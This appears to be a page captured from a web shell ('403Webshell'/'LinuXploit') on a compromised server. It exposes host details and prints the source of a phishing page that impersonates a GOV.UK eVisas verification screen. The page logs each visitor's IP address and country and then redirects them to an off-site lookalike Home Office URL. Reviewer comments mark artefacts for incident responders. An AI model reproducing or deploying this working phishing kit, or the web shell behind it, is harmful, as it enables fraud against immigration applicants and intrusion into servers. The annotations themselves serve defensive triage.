403Webshell
Server IP : 159.203.58.96  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux wordpress 5.15.0-152-generic #162-Ubuntu SMP Wed Jul 23 09:48:42 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/www.points.homeoffice.gov.uk/


Current File : /var/www/html/www.points.homeoffice.gov.uk/index.php
<?php
// Open (or resume) the PHP session; it only carries the token created below.
session_start();

/* ------------------------------
   BASIC RATE LIMITING
   Runs on every request, GET or POST, because it sits ahead of the
   method check. One marker file per client address is kept in the
   system temp directory, named "rate_" + md5(REMOTE_ADDR).
   NOTE(review): nothing visible in this file removes the markers, so
   they accumulate on the host; useful as a filesystem artefact when
   triaging the server.
-------------------------------- */
$ip = $_SERVER['REMOTE_ADDR'];
$limitFile = sys_get_temp_dir() . "/rate_" . md5($ip);

// A request arriving less than 2 seconds after the marker's mtime gets a bare
// 429 and no body. The exit happens before touch(), so a throttled request
// does not extend the window.
if (file_exists($limitFile) && time() - filemtime($limitFile) < 2) {
    http_response_code(429);
    exit;
}
// Create the marker, or refresh its mtime, for every request that passes.
touch($limitFile);

/* ------------------------------
   CSRF TOKEN
   Generated once per session: 16 random bytes, hex-encoded (32 chars).
   The same value is printed into the page's inline script and compared
   against the "csrf" field of the POST request.
-------------------------------- */
if (empty($_SESSION['csrf'])) {
    $_SESSION['csrf'] = bin2hex(random_bytes(16));
}

/* ------------------------------
   UTILITIES
-------------------------------- */
/**
 * Pick the address string that will be recorded for the current request.
 *
 * Checks $_SERVER keys in a fixed priority order and returns the first
 * non-empty one, cut at the first comma (no trimming, no validation).
 *
 * NOTE(review): the first three keys come from request headers, which any
 * client can set unless a trusted proxy overwrites them. The value is an
 * arbitrary client-influenced string, not a verified IP, so anything logged
 * from it is weak evidence of who actually visited.
 *
 * @return string First comma-separated element of the chosen value, or
 *                'Unknown' when none of the keys is populated.
 */
function getUserIP() {
    $candidates = [
        'HTTP_CF_CONNECTING_IP',
        'HTTP_X_REAL_IP',
        'HTTP_X_FORWARDED_FOR',
        'REMOTE_ADDR',
    ];

    foreach ($candidates as $header) {
        if (empty($_SERVER[$header])) {
            continue;
        }
        // Forwarded-style headers may hold a comma-separated chain; keep the first hop only.
        $hops = explode(',', $_SERVER[$header]);
        return $hops[0];
    }

    return 'Unknown';
}

/**
 * Look up a country name for an address via the ip-api.com JSON endpoint.
 *
 * Makes a blocking outbound request over plain HTTP with a 2-second timeout
 * and reads the "country" field of the decoded response.
 *
 * NOTE(review): $ip is interpolated into the URL as-is. The caller in this
 * file passes a header-derived value, so the request path is
 * client-influenced. For responders, outbound calls from the web server to
 * ip-api.com are a network-level indicator of this page being exercised.
 *
 * @param string $ip Address string to look up (not validated here).
 * @return string Country name, or 'Unknown' when the request fails or the
 *                response has no "country" field.
 */
function getCountry($ip) {
    $handle = curl_init("http://ip-api.com/json/{$ip}");
    curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($handle, CURLOPT_TIMEOUT, 2);

    $body = curl_exec($handle);
    curl_close($handle);

    // curl_exec() yields false on failure; an empty body is treated the same way.
    if (!$body) {
        return 'Unknown';
    }

    $decoded = json_decode($body, true);
    return $decoded['country'] ?? 'Unknown';
}

/* ------------------------------
   HANDLE POST
-------------------------------- */
// POST branch: the only server-side action of this page. It records one line
// per accepted request and returns an empty response; nothing submitted by the
// visitor other than the token is read.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {

    // Reject with 403 when the token is missing or differs from the session copy.
    // NOTE(review): `!==` is not a constant-time comparison; hash_equals() is the
    // conventional choice for comparing secrets.
    if (!isset($_POST['csrf']) || $_POST['csrf'] !== $_SESSION['csrf']) {
        http_response_code(403);
        exit;
    }

    // Overwrites the REMOTE_ADDR-based $ip set earlier with the header-derived
    // value, then performs the outbound country lookup for it.
    $ip = getUserIP();
    $country = getCountry($ip);
    // Timestamp in whatever timezone PHP is configured for; no offset is recorded.
    $time = date('Y-m-d H:i:s');

    // Appended to log.txt next to this script, under an exclusive lock.
    // NOTE(review): $ip is written without sanitising and may come from a
    // client-set header, so individual entries can be forged. The file lives in
    // the script's own directory, presumably reachable over HTTP (confirm against
    // the server config). It is the artefact to collect when scoping who
    // interacted with the page.
    $log = "[{$time}] {$ip} | {$country}\n";
    file_put_contents(__DIR__ . "/log.txt", $log, FILE_APPEND | LOCK_EX);

    exit;
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Welcome to GOV.UK – Verification</title>
<meta name="viewport" content="width=device-width, initial-scale=1">

<style>
body {
    margin: 0;
    font-family: Arial, sans-serif;
    background: #f8f8f8;
}
.header {
    background: #2b7a3d;
    color: white;
    padding: 15px 20px;
    font-size: 22px;
    font-weight: bold;
}
.container {
    max-width: 600px;
    margin: 40px auto;
    background: white;
    padding: 25px;
    border-radius: 6px;
    box-shadow: 0 0 10px rgba(0,0,0,.1);
}
.checkbox-area {
    display: flex;
    align-items: center;
    cursor: pointer;
    margin-top: 20px;
}
.checkbox {
    width: 22px;
    height: 22px;
    border: 2px solid #555;
    margin-right: 10px;
    position: relative;
}
.checkbox.checked::after {
    content: "✔";
    position: absolute;
    left: 3px;
    top: -2px;
    font-size: 18px;
    color: green;
}
button {
    padding: 10px 18px;
    background: #2b7a3d;
    color: white;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}
.message {
    margin-top: 15px;
}
</style>
</head>

<body>
<div class="header">eVisas: access and use your online immigration status</div>

<div class="container">
    <h2>Human Verification</h2>
    <p>Please confirm you are a real person before continuing.</p>

    <div class="checkbox-area" id="checkArea">
        <div class="checkbox" id="box"></div>
        <span>I am not a robot</span>
    </div>

    <div id="question" style="display:none">
        <p><strong>Is fire hot?</strong></p>
        <button onclick="answer(true)">Yes</button>
        <button onclick="answer(false)">No</button>
        <div class="message" id="msg"></div>
    </div>
</div>

<script>
// Guard flag read and set by sendLog(); limits the beacon to one per page load.
let sent = false;
// Session token rendered into the page by PHP at response time. The server
// builds it with bin2hex(), so the printed value is hex characters only.
const csrf = "<?= $_SESSION['csrf'] ?>";

/**
 * Fire the single logging beacon for this page load.
 *
 * POSTs the session token back to the page's own URL (empty fetch target),
 * which triggers the server-side log write. The response is never read and
 * failures are not handled. Later calls are no-ops thanks to the `sent` flag.
 */
function sendLog() {
    if (!sent) {
        sent = true;

        const payload = "csrf=" + csrf;
        fetch("", {
            method: "POST",
            headers: {"Content-Type": "application/x-www-form-urlencoded"},
            body: payload
        });
    }
}

// Clicking the fake "I am not a robot" row ticks the box, reveals the
// question, and sends the beacon. The visit is logged at this point, before
// the visitor answers anything.
document.getElementById("checkArea").onclick = () => {
    const tickBox = document.getElementById("box");
    const challenge = document.getElementById("question");

    tickBox.classList.add("checked");
    challenge.style.display = "block";
    sendLog();
};

/**
 * Handle a click on the Yes/No buttons of the "verification" question.
 *
 * The check is purely client-side: nothing is sent to the server here. A
 * truthy answer shows a status line and, after 2.5 s, navigates the browser
 * to a hard-coded off-site URL; a falsy answer only changes the status text.
 * NOTE(review): the destination host differs from the one serving this page
 * and carries a government-style hostname in its path. That mismatch is the
 * thing to look for in proxy logs and URL filtering.
 *
 * @param {boolean} ok True for the "Yes" button, false for "No".
 */
function answer(ok) {
    const statusLine = document.getElementById("msg");

    if (!ok) {
        statusLine.textContent = "Incorrect answer. Try again.";
        return;
    }

    statusLine.textContent = "Verified. Redirecting…";
    setTimeout(function () {
        window.location.href = "https://lxme.in/gb-points.homeoffice.gov.uk/gui-sms-jsf-home-SMS-003-Home.faces.html";
    }, 2500);
}
</script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit